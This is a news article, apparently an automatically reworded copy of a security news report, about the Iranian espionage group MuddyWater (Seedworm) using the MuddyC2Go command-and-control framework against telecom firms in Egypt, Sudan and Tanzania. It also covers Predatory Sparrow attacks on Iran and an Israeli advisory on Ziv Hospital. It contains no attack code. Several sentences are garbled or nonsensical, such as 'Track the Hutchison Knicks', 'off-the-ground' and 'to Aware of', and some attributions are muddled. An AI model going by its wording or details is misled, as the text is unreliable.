The iranian nation state actor is known as muddy water A newly discovered command and control (C2) framework called MuddyC2Go was used to target the telecommunications sectors of Egypt, Sudan, and Tanzania.
Symantec Threat Hunters, part of Broadcom, is tracking activity under the name Seedworm, which also goes by monikers Boggy Serpens, Cobalt Ulster, Earth Vetala, ITG17, Mango Sandstorm (formerly Mercury), Static Kitten, TEMP.Zagros and more Track the Hutchison Knicks.
According to assessments, MuddyWater has been active since at least 2017, is affiliated with Iran’s Ministry of Intelligence and Security (MOIS), and primarily targets Middle Eastern entities.
Deep Instinct first highlighted the cyber espionage group’s use of MuddyC2Go last month, describing it as a Golang-based alternative to PhonyC2, itself a successor to MuddyC3. However, there is evidence that it may have been adopted as early as 2020.
From user to administrator: Learn how hackers gain total control
Learn the secret tactics hackers use to become administrators and how to detect and stop it before it’s too late. Register now for our webinar.
Join now
While the full functionality of MuddyC2Go is unknown, the executable is equipped with a PowerShell script that automatically connects to Seedworm’s C2 server, allowing the attacker to remotely access victim systems without requiring manual execution by the operator.
The latest set of intrusions occurred in November 2023 and was also found to rely on SimpleHelp and Venom Proxy, as well as custom keyloggers and other publicly available tools.
The attack chain launched by this group has a track record of weaponizing known vulnerabilities in phishing emails and unpatched applications to gain initial access, followed by reconnaissance, lateral movement and data collection.
In attacks against unnamed telecom organizations documented by Symantec, the MuddyC2Go launcher was executed to establish contact with attacker-controlled servers and also deployed legitimate remote access software such as AnyDesk and SimpleHelp.
It is said that this entity was previously compromised by adversaries in early 2023, in which SimpleHelp was used to launch PowerShell, provide agent software, and install the JumpCloud remote access tool.
“At another telecommunications and media company targeted by the attackers, the SimpleHelp event was used multiple times to connect to known Seedworm infrastructure,” Symantec noted. “Customized Venom Proxy hacking tools were also executed on the network. build, as well as a new custom keylogger used by the attackers in this campaign.”
The company said that by using a combination of customized, off-the-ground and publicly available tools in the attack chain, the goal is to evade detection for as long as possible to achieve its strategic objectives.
“The organization will continue to innovate and develop its toolset as needed to keep its activities out of the spotlight,” Symantec concluded. “The organization continues to make heavy use of PowerShell and PowerShell-related tools and scripts, which highlights the need for the organization to Aware of suspicious use of PowerShell on their network.”
The development was initiated by an Israel-linked group called Gonjeshke Darande (meaning “predatory sparrow” in Persian) claim The cyberattack, launched in response to “aggression by the Islamic Republic and its proxies in the region,” damaged “most of the gas stations in Iran.”
The group resurfaced in October 2023 after nearly a year of silence and is believed to be linked to Israel’s military intelligence service and has launched destructive attacks in Iran, including on the country’s steel facilities, gas stations and railway networks.
The cyber attack also came amid an advisory issued by Israel’s National Cyber Authority (INCD), which accused Iran and the pro-Hamas group Hezbollah of unsuccessful attempts to disrupt Ziv Hospital and blamed the attack on a well-known actor. Threat actors for Agrius and Cedar, Lebanon.
“The attack was carried out by Iran’s Intelligence Ministry and also involved the ‘Lebanese Cedars’ cyber force led by Hezbollah Mohammad Ali Merhi,” the INCD said.